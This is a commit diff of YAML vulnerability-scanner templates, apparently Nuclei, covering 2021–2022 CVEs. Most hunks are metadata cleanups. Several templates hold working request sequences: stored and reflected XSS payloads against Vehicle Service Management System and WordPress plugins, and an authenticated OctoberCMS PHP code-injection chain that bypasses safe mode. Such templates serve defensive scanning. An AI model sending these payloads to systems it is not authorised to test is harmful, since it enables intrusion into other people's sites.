     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-21802.yaml

@@ -1,13 +1,13 @@
 id: CVE-2021-21802
 
 info:
-  name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-21803.yaml

@@ -1,13 +1,13 @@
 id: CVE-2021-21803
 
 info:
-  name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21803
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-22122.yaml

@@ -1,16 +1,16 @@
 id: CVE-2021-22122
 
 info:
-  name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS
+  name: FortiWeb - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated,
-    remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points.
+    FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
   reference:
     - https://www.fortiguard.com/psirt/FG-IR-20-122
     - https://twitter.com/ptswarm/status/1357316793753362433
     - https://fortiguard.com/advisory/FG-IR-20-122
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22122
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -31,3 +31,5 @@ requests:
           - "No policy has been chosen."
         condition: and
         part: body
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-24176.yaml

@@ -1,14 +1,15 @@
 id: CVE-2021-24176
 
 info:
-  name: WordPress JH 404 Logger XSS
+  name: WordPress JH 404 Logger <=1.1 - Cross-Site Scripting
   author: Ganofins
   severity: medium
-  description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
+  description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.
   reference:
     - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
     - https://wordpress.org/plugins/jh-404-logger/
     - https://ganofins.com/blog/my-first-cve-2021-24176/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24176
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
@@ -30,4 +31,6 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-24235.yaml

@@ -1,14 +1,14 @@
 id: CVE-2021-24235
 
 info:
-  name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
+  description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
     - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139
     - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-24237.yaml

@@ -1,14 +1,14 @@
 id: CVE-2021-24237
 
 info:
-  name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
+  name: WordPress Realteo <=1.2.3 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
+  description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
   reference:
     - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
     - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
-    - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24237
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +38,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-24245.yaml

@@ -1,15 +1,14 @@
 id: CVE-2021-24245
 
 info:
-  name: WordPress Plugin Stop Spammers 2021.8 - Reflected XSS
+  name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: The Stop Spammers WordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.
+  description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24245
     - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
     - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -41,4 +40,6 @@ requests:
       - type: word
         part: body
         words:
-          - "ad\" accesskey=X onclick=alert(1)"
+          - "ad\" accesskey=X onclick=alert(1)"
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-24274.yaml

@@ -1,14 +1,14 @@
 id: CVE-2021-24274
 
 info:
-  name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
+  name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+  description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
   reference:
     - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24274
     - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24274
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-25075.yaml

@@ -3,7 +3,7 @@ id: CVE-2021-25075
 info:
   name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
   author: DhiyaneshDK
-  severity: low
+  severity: high
   description: |
     WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
   reference:

cves/2021/CVE-2021-25120.yaml

@@ -7,8 +7,8 @@ info:
   description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
   reference:
     - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
-    - https://www.cvedetails.com/cve/CVE-2021-25120/
     - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25120
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

cves/2021/CVE-2021-36749.yaml

@@ -6,7 +6,6 @@ info:
   severity: medium
   description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
   reference:
-    - https://www.cvedetails.com/cve/CVE-2021-36749/
     - https://github.com/BrucessKING/CVE-2021-36749
     - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E
     - https://nvd.nist.gov/vuln/detail/CVE-2021-36749

cves/2021/CVE-2021-39501.yaml

@@ -7,8 +7,8 @@ info:
   description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
   reference:
     - https://github.com/eyoucms/eyoucms/issues/17
-    - https://www.cvedetails.com/cve/CVE-2021-39501
     - https://github.com/KietNA-HPT/CVE
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39501
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

cves/2021/CVE-2021-46068.yaml

@@ -1,5 +1,5 @@
-id: CVE-2021-46068
-
+id: CVE-2021-46068
+
 info:
   name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Users.php?f=save HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
-
-      - |
-        GET /admin/?page=user HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
+
+      - |
+        GET /admin/?page=user HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "Administrator\"><script>alert(document.domain)</script> Admin")'
+        condition: and

cves/2021/CVE-2021-46069.yaml

@@ -1,53 +1,53 @@
-id: CVE-2021-46069
-
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
-  reference:
-    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 4.8
-    cve-id: CVE-2021-46069
-    cwe-id: CWE-79
-  metadata:
-    verified: "true"
-  tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Master.php?f=save_mechanic HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
-
-      - |
-        GET /admin/?page=mechanics HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
-        condition: and
+id: CVE-2021-46069
+
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46069
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_mechanic HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
+
+      - |
+        GET /admin/?page=mechanics HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and

cves/2021/CVE-2021-46071.yaml

@@ -1,5 +1,5 @@
-id: CVE-2021-46071
-
+id: CVE-2021-46071
+
 info:
   name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Master.php?f=save_category HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
-
-      - |
-        GET /admin/?page=maintenance/category HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_category HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
+
+      - |
+        GET /admin/?page=maintenance/category HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and

cves/2021/CVE-2021-46072.yaml

@@ -1,5 +1,5 @@
-id: CVE-2021-46072
-
+id: CVE-2021-46072
+
 info:
   name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Master.php?f=save_service HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
-
-      - |
-        GET /admin/?page=maintenance/services HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_service HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
+
+      - |
+        GET /admin/?page=maintenance/services HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and

cves/2021/CVE-2021-46073.yaml

@@ -1,5 +1,5 @@
-id: CVE-2021-46073
-
+id: CVE-2021-46073
+
 info:
   name: Vehicle Service Management System - Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
-
-      - |
-        GET /vehicle_service/admin/?page=user/list HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
+
+      - |
+        GET /vehicle_service/admin/?page=user/list HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
+        condition: and

cves/2022/CVE-2022-0594.yaml

@@ -1,4 +1,4 @@
-id: CVE-2022-0594
+id: CVE-2022-0594
 
 info:
   name: Shareaholic < 9.7.6 - Information Disclosure
@@ -17,26 +17,26 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
-
-    matchers-condition: and
-    matchers:
-
-      - type: word
-        part: body
-        words:
-          - 'plugin_version'
-          - 'shareaholic_server_reachable'
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - 'plugin_version'
+          - 'shareaholic_server_reachable'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

cves/2022/CVE-2022-0692.yaml

@@ -7,7 +7,7 @@ info:
   description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
   reference:
     - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
-    - https://www.cvedetails.com/cve/CVE-2022-0692
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0692
     - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203
     - https://github.com/rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a
   classification:

cves/2022/CVE-2022-21705.yaml

@@ -1,107 +1,107 @@
-id: CVE-2022-21705
-
-info:
-  name: OctoberCMS Authenticated Remote Code Execution
-  author: iPhantasmic
-  severity: high
-  description: |
-    Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area.
-  remediation: |
-    The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
-  reference:
-    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
-    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
-    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.2
-    cve-id: CVE-2022-21705
-    cwe-id: CWE-74
-  tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
-
-
-requests:
-  - raw:
-      - | # to obtain session_key and token
-        GET /backend/backend/auth/signin HTTP/1.1
-        Host: {{Hostname}}
-
-      - | # to perform authentication and obtain admin cookies
-        POST /backend/backend/auth/signin HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
-
-      - | # to inject php code in Markup editor and perform exploit
-        POST /backend/cms HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-OCTOBER-REQUEST-HANDLER: onSave
-        X-OCTOBER-REQUEST-PARTIALS:
-        X-Requested-With: XMLHttpRequest
-
-        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
-
-      - | # to obtain theme
-        POST /backend/cms HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
-        X-OCTOBER-REQUEST-PARTIALS:
-        X-Requested-With: XMLHttpRequest
-
-        _session_key={{session_key}}&_token={{token}}&search=&type=page
-
-      - | # to access the template page for generated exploit
-        POST /backend/cms HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
-        X-OCTOBER-REQUEST-PARTIALS:
-        X-Requested-With: XMLHttpRequest
-
